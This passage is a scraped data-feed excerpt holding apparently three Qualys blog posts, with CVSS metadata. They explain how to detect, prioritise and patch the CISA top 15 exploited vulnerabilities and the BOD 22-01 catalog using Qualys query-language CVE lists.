[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.

#### Confluence Server and Data Center Vulnerability

An Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.

#### Top Vulnerabilities of 2020 Persist

Three additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.

### How Can Qualys Help?

The Qualys Research Team stays on top of CISA’s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.

#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR

[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report.
[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities, which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.

Using VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.

Use this QQL statement:

    vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]

View vulnerabilities by severity in Qualys VMDR

Qualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as it may propagate across multiple assets in your infrastructure.

Dashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited

Qualys Unified Dashboard

#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR

Qualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company’s internet-facing assets. To do so, apply the tag “Internet Facing Assets” in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.

Use this QQL statement:

    vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]

Prioritizing vulnerabilities for remediation in Qualys VMDR

#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR

Qualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.

To view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.

Using Qualys Patch Management to apply patches

Qualys Patch Management also provides the ability to deploy custom patches.
The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures and to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps the catalog\u2019s CVEs to QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase and flags them with the RTI field \u201cCISA Exploited\u201d. This mapping is ongoing, because CISA regularly adds new CVEs to the catalog through its feeds.\n\nDirective 22-01 urges all organizations to reduce their exposure to cyberattacks by prioritizing the remediation of these identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. CISA groups the remediation guidance into multiple categories based on attack surface severity and time-to-remediate. 
The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022), we recommend searching with QQL (Qualys Query Language) on the threat-intel flag that marks the QIDs Qualys has released for the catalog: **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and view your status and overall management in real-time. 
With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines set in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help comply with the aggressive remediation timelines set by the directive. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments. Qualys solutions can help your organization achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update their internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to the directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. 
These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 vulnerabilities (34%) need to be patched in the next two weeks, by **November 17, 2021**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months, by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ 
`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this 
vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and view your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by **May 3, 2022**. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud 
